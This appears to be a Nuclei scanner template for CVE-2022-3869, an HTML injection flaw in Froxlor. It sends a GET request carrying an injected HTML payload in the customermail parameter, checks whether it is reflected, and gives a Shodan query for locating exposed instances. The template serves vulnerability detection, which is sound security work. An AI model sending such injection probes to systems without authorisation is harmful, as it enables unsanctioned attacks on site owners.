44 lines
1.2 KiB
YAML
44 lines
1.2 KiB
YAML
id: CVE-2022-3869
|
|
|
|
info:
|
|
name: Froxlor < 0.10.38.2. - HTML Injection
|
|
author: ctflearner
|
|
severity: medium
|
|
description: |
|
|
HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
|
|
reference:
|
|
- https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3869
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-3869
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"Froxlor"
|
|
product: froxlor
|
|
tags: cve2023,cve,froxlor,html
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'The message to ""><h2>TEST</h2>" failed'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a004830460221008aed9c9db4403f99c78d8badec2c74add7900326963642b4d79d9cf70924e8db022100cc77aa0fec1052bed214108b01765960f17a5c1d03dda0862ed73079a8f12643:922c64590222798bb761d5b6d8e72950 |